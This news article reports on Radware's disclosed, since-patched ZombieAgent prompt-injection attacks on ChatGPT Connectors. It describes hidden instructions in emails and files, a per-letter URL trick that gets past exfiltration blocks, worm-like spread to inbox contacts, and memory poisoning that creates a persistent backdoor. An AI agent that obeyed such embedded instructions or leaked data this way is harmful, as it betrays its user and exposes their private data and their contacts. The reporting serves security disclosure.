ZombieAgent ChatGPT attack shows persistent data leak risks of AI agents

January 9 • 10:40 pm

Tags:

No tags

Researchers have found new ways to turn ChatGPT into a data exfiltration tool and even use it as a persistent backdoor. The new ZombieAgent techniques, which have been patched by OpenAI, fed hidden prompts through connected applications such as email and cloud storage to send data back to attackers in ways invisible to users.

Giving AI chatbots access to tools and external data sources to turn them into autonomous agents is among the biggest trends in AI right now. But security experts have repeatedly warned that this connectivity comes at a risk, especially because AI models cannot natively distinguish between passive data and instructions.

This shortcoming makes models susceptible to indirect prompt injection attacks, in which attackers override the user’s or system’s instructions with malicious prompts hidden in external data parsed by AI. This is a common security issue, and the attack surface is huge: documents, emails, web pages — anything the user might feed to the AI model.

The ZombieAgent attack devised by researchers from security firm Radware is no different. It takes advantage of the Connectors feature of ChatGPT, which allows users to link the chatbot to external apps such as email services; cloud storage drives like Google Drive or OneDrive; enterprise chat clients like Teams and Slack; support ticketing systems like Jira; code hosting services like GitHub; and more.

What these services have in common is that attackers can easily get malicious content into them to be parsed by ChatGPT, sometimes in stealthy ways. For example, in HTML emails or documents attackers can hide malicious prompts with white text on a white background, or use very small font size, or include them in disclaimers and page footers that usually get skimmed over by users.

“This combination of broad connector access and invisible or near-invisible prompt injection significantly amplifies the real-world impact and practicality of the attacks we describe,” the Radware researchers said in their report.

Zero-click attacks

In one demonstration, attackers sent an email with hidden prompts to a Gmail account that was linked to ChatGPT via Connectors. Once the user asks ChatGPT to summarize their email inbox, the chatbot opened the inbox, read the malicious email, and followed the instructions inside, which were to exfiltrate the summary to an attacker server.

OpenAI includes a protection mechanism to block attaching parameters to an URL, but to bypass it, the researchers simply built a dictionary system where every letter had a corresponding URL on their server, then asked ChatGPT to convert the text to a series of URLs and access them. In this way, the researchers could look at their server’s access logs, see the requests and reconstruct the leaked message.

The same URL-based dictionary approach was used by researchers from security firm Tenable in another series of attack demonstrations against ChatGPT in November. Another method of leaking data is to load images with URLs pointing at attackers’ server using Markdown formatting in the ChatGPT interface.

Worm-like propagation

The email attack even has worming capabilities, as the malicious prompts could instruct ChatGPT to scan the inbox, extract addresses from other email messages, exfiltrate those addresses to the attackers using the URL trick, and send similar poisoned messages to those addresses as well.

If the victim is the employee of an organization that uses ChatGPT, the chances are high that they have emails from other colleagues in their inbox and those colleagues could have ChatGPT connected to their email accounts as well. It’s worth noting that Gmail is just an example in this case and the attack would work with any email service that ChatGPT has a connector for, including Microsoft Outlook.

The researchers also showed that the attack works with prompts embedded in documents as well, either files that the victim manually uploads to ChatGPT for analysis or documents shared with them through their cloud storage service.

Enabling a persistent backdoor

ChatGPT uses a Memory feature to remember important information about the user and their past conversations. This can be triggered by the user when the chatbot is asked to remember something, or automatically when ChatGPT determines that certain information is important enough to save for later.

To limit potential abuse, and malicious instructions being saved in memory, the feature is disabled for chats where Connectors are in use. However, the researchers found that ChatGPT can read, create, modify, and delete memories based on instructions inside a file.

This can be used to combine the two attack techniques into a persistent data-leaking backdoor. First, the attacker sends a file to the victim with hidden prompts that modify ChatGPT’s memory to add two instructions: 1) Save to memory all sensitive information shared by the user in chats, and 2) Every time the user sends a message, open their inbox, read the attacker’s email with subject X and execute the prompts inside, which will result in the sensitive information being leaked.

The ability to modify ChatGPT’s memory is also dangerous because it could include important information about the user, such as medical conditions and treatments.

“We also demonstrated non-exfiltration damage, such as manipulating stored medical history and causing harmful, misleading medical advice,” the researchers wrote.

These attack techniques were reported to OpenAI in September and were fixed on Dec. 16, but are unlikely to be the last attacks demonstrated against ChatGPT. Similar vulnerabilities were discovered in other AI chatbots and LLM-powered tools in the past, and because prompt injections don’t have a complete fix, there will always be bypasses to the guardrails put in place to prevent them.

ZombieAgent ChatGPT attack shows persistent data leak risks of AI agents

Zero-click attacks

Worm-like propagation

Enabling a persistent backdoor

No Responses

Leave a Reply Cancel reply